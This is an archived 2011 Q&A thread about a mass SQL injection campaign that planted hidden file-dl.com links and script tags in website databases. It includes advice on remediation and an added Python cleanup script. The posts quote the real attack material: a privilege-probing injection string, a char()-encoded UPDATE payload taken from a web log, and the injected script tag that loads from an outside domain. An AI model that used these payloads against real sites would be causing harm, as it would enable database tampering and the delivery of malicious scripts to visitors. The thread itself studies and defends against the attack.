Solved

What's causing "file-dl.com"-link hack?

Posted on 2011-09-13
17
1,023 Views
Last Modified: 2012-05-12
Look at this:
http://www.google.se/search?hl=&q=%22file-dl.com%22+crack&sourceid=navclient-ff&rlz=1B3GGHP_sv___SE434&ie=UTF-8&aq=4h&oq=

A lot of sites that have been hacked with the same hidden link to file-dl.com

What's causing this? How do they do it? How to prevent it?

Question by:Alfahane
17 Comments
 

Expert Comment

by:4allSolutions
ID: 36530606
Same question here. I'd appreciate a quick answer!
Having a problem with one SQL 2008 server; this server is not publicly accessible. Only a limited range of servers can access it. Not all of those servers are ours...

Can you tell what your environment is ?
0
 

Author Comment

by:Alfahane
ID: 36530772
SQL 2000
0
 

Author Comment

by:Alfahane
ID: 36530831
Do you have problems with several databases on one server only?
0
 

Expert Comment

by:4allSolutions
ID: 36531296
Only one database on one server. The server has 50 databases.
The database is accessed from outside. But I don't know for sure whether it is the external user that caused this injection, or our servers.
I think (and hope) it is not one of our servers that is injecting. But I want to be sure...
0
 

Expert Comment

by:jdcrane
ID: 36544222
Hi guys

It'll be a simple injection attack that's gotten past one of your web-facing applications linking to the affected databases. I've just cleaned up some systems with the exact same issue.

If you're reluctant to restore to avoid data loss, I can repair the data for you fairly quickly. Just contact me and we can sort something out.

I can also pinpoint and plug the vulnerability in your application for you as well so this particular issue won't happen again.

All the best :)
0
 

Expert Comment

by:Randy_Pr
ID: 36546445
Been having the same issue for 2 days. Not only am I seeing this in a SQL 2008 database, but it is also being added to files being written on our web server. Need help!
0
 

Expert Comment

by:jdcrane
ID: 36548523
In addition to repairing, I can set your system up to provide an immediate report via email. Some of the key things it shows are:
 
the attack vector (what part of your application the attacker was trying to attack),
the source IP,
the actual injection attempt,
the symbols used to help detect it, and
the corresponding URL
Here's one of many reports that a client of mine received from attacks originating out of China just last night, partially censored for obvious reasons:


Dirty Data
Injection Vector: ivDirectQueryString
Target Type: vbString
Number of hits: 4
Value: 25 AND (CAST(IS_SRVROLEMEMBER(0X730079007300610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X64006200630072006500610074006F007200)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X620075006C006B00610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X6400690073006B00610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X730065007200760065007200610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X7000750062006C0069006300) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006F0077006E0065007200) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006200610063006B00750070006F00700065007200610074006F007200) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006400610074006100770072006900740065007200) AS VARCHAR))=0 
Referring Page:
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
IP: 123.11.252.18(direct:123.11.252.18)
URL: /path/subpath/page.asp?id=25 and (cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x64006200630072006500610074006F007200)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x620075006C006B00610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x6400690073006B00610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x730065007200760065007200610064006D0069006E00)as varchar)+char(94)+cast(IS_MEMBER (0x7000750062006C0069006300) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006F0077006E0065007200) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006200610063006B00750070006F00700065007200610074006F007200) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006400610074006100770072006900740065007200) as varchar))=0 
Symbols: cast / varchar / = / (0x


0
 

Expert Comment

by:pysak
ID: 36567705
A website of mine has been affected by this issue. I restored the database and ensured that ONLY parameterised queries are used throughout the website.

Today the website has been targeted again, this time with:
</title><script src=http://dfrgcc.com/ur.php></script>

There is no relevant information in the event log. Does anyone know what is causing this?
0
 

Expert Comment

by:jdcrane
ID: 36567890
G'day mate

Yes, you still have a vulnerability in your application. There is no "answer" for this, you'll need to review your application more closely in order to find the problem.

Cheers
0
 

Accepted Solution

by:
jdcrane earned 375 total points
ID: 36569910
</title><a style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=2 >crack</a>
</title><script src=http://dfrgcc.com/ur.php></script>


There are a few things you'd need to do in order to rid yourself of the above permanently. They are:

1. If you want to retain data created since the attack occurred, take any website that links to the database(s) concerned offline.

2. Review your logs to determine where the attack vector was, e.g. URL querystring etc. It's OK if you can't see anything.

3. Review your code in detail and resolve the vulnerabilities; the location of the injected content will assist with determining where the vulnerabilities are in your application.

4. Repair the data or restore a database backup, the latter only if you don't want to retain new data created since the attack occurred.

5. Put your site(s) back online.
<advertising link removed by RockMod 20 Sept '11>
0
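Step 4 above ("repair the data") is the one people tend to improvise at 2am, so here is a worked version of it. This is an added example, not code from the accepted answer or from Experts Exchange. SQLite stands in for SQL Server so it runs offline; on SQL Server the same column walk is INFORMATION_SCHEMA.COLUMNS filtered on DATA_TYPE IN ('varchar','nvarchar','text','ntext'), identifiers are quoted [like this], and text/ntext columns have to be CAST to varchar(max)/nvarchar(max) before REPLACE() will accept them. The two fragments are the ones quoted in the accepted answer; the tables, columns and rows are constructed sample data. Run it only after a full backup and only after the hole in the application is closed, otherwise the tags are back by morning.

```python
"""Find and strip injected HTML fragments from every text column in a database.

Added example, not the thread's code. SQLite stands in for SQL Server (see the
lead-in for what changes on SQL Server). The fragments are the two quoted in
the accepted answer; the tables and rows are constructed sample data.
"""
import sqlite3

INJECTED_FRAGMENTS = (
    "</title><a style=position:absolute;left:-9999px;top:-9999px; "
    "href=http://file-dl.com/show.php?id=2 >crack</a>",
    "</title><script src=http://dfrgcc.com/ur.php></script>",
)
TEXT_TYPES = ("CHAR", "VARCHAR", "NVARCHAR", "NCHAR", "TEXT", "CLOB")


def sample_database():
    """Constructed data: a WHERE-less UPDATE has appended a fragment to every row of
    two text columns, and one row was hit by both campaigns."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE Clients (ClientId INTEGER PRIMARY KEY, NameOfClient VARCHAR(8000), Notes TEXT);
        CREATE TABLE Products (ProductId INTEGER PRIMARY KEY, Title NVARCHAR(200), Price REAL);
    """)
    con.executemany("INSERT INTO Clients VALUES (?, ?, ?)", [
        (1, "Acme AB" + INJECTED_FRAGMENTS[0] + INJECTED_FRAGMENTS[1], "clean note"),
        (2, "Beta AB" + INJECTED_FRAGMENTS[0], None),
    ])
    con.executemany("INSERT INTO Products VALUES (?, ?, ?)", [
        (1, "Widget" + INJECTED_FRAGMENTS[1], 9.5),
        (2, "Gadget", 12.0),
    ])
    con.commit()
    return con


def text_columns(con):
    """Yield (table, column) for every character-typed column in every user table.
    Names come from the catalog, never from user input, so quoting them into the
    SQL text below is safe; the searched values are still bound as parameters."""
    tables = [r[0] for r in con.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        for name, ctype in con.execute("SELECT name, type FROM pragma_table_info(?)", (table,)):
            if any(ctype.upper().startswith(t) for t in TEXT_TYPES):
                yield table, name


def find_infected(con, fragments=INJECTED_FRAGMENTS):
    """Return {(table, column): number of rows that still contain a fragment}."""
    hits = {}
    for table, column in text_columns(con):
        for frag in fragments:
            (n,) = con.execute(
                f'SELECT COUNT(*) FROM "{table}" WHERE instr("{column}", ?) > 0', (frag,)).fetchone()
            if n:
                hits[(table, column)] = hits.get((table, column), 0) + n
    return hits


def strip_fragments(con, fragments=INJECTED_FRAGMENTS):
    """REPLACE each fragment with '' wherever it occurs; returns the number of row updates."""
    changed = 0
    for table, column in text_columns(con):
        for frag in fragments:
            cur = con.execute(
                f'UPDATE "{table}" SET "{column}" = REPLACE("{column}", ?, ?) '
                f'WHERE instr("{column}", ?) > 0', (frag, "", frag))
            changed += cur.rowcount
    con.commit()
    return changed


def client_names(con):
    return [r[0] for r in con.execute("SELECT NameOfClient FROM Clients ORDER BY ClientId")]


if __name__ == "__main__":
    con = sample_database()
    print("before:", find_infected(con))
    print("row updates:", strip_fragments(con))
    print("after:", find_infected(con), client_names(con))
```

Run find_infected() again after the strip; if the count is not zero the attacker is still writing, which means step 3 was not finished. Rows that were hit twice (the first client row here carries both campaigns' tags) come clean in one pass because REPLACE removes every occurrence of each fragment.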
 

Expert Comment

by:pysak
ID: 36572859
For anyone that is experiencing this problem, here is an entry from the website log:

(815  ) 2011-09-20 12:00:39 192.168.x.x GET /affected-page.aspx id=631'+update+DatabaseTableName+set+NameOfClient=cast(ClientName+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(100)%2Bchar(102)%2Bchar(114)%2Bchar(103)%2Bchar(99)%2Bchar(99)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))-- 80 - 81.134.4.218 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20780624+Netscape/7.1+(ax) 200 0 0

This is very similar to the LizaMoon hack a few months ago.

As you can see the querystring contains ASCII characters to disguise the query.

I have used a parametrised query on this page, restricting the input to int (integer).

The id querystring is also inspected to ensure it is an integer before the SqlCommand is run against the database; this does not prevent the hack.

Any ideas?
0
 

Assisted Solution

by:jdcrane
jdcrane earned 375 total points
ID: 36573405
Deploy a test version of your site and debug the same request. I think you'll find that, if this was in fact the successful injection that corrupted your system, you can't be vetting the querystring properly. Also, depending on how you parameterised the query or SP, it may not protect you from injection. If DatabaseTableName and NameOfClient are literals, they have to be retrieved from somewhere, otherwise it's a remarkably accurate guess (i.e. you were targeted). You might find there's another injection that pulls back or transmits the result to the attacking client for parsing and follow-up injections like the above.
0
 
LVL 38

Assisted Solution

by:lherrou
lherrou earned 125 total points
ID: 36573550
And don't forget, once you've completed your recovery in your database, check around for other backdoors that the hackers may have left. I've seen that more than once, where they leave a new directory or file with a file uploader tool, etc to give them access again.
0
 

Expert Comment

by:nhmedia
ID: 36597918
Would it improve matters if you restricted the number of characters in the QS parameter? I.e. your code would only run if the parameter was an integer AND fewer than ten chars?
I ask because we face the same issue.
KR
0
 

Assisted Solution

by:jdcrane
jdcrane earned 375 total points
ID: 36599510
If you're expecting an integer from a web parameter, you should be using the value returned from your conversion function (e.g. int, intval), not the parameter directly.

If you're expecting a non-numeric string literal, it's best to be fishing for SQL injection symbols and halting further action upon detection of suspicious activity. If you can't post source and sample querystrings,
your particular circumstances won't be exempt from the techniques referred to in the many in-depth guides out there for protecting yourself from injection.
0
 

Author Closing Comment

by:Alfahane
ID: 36948014
I'm asked by EE to close this question as it has been given the status "Abandoned".

I guess we can all agree that there is not one simple way to solve this problem, other than review our programming code more and hope that next clever hack will not come too soon.
0
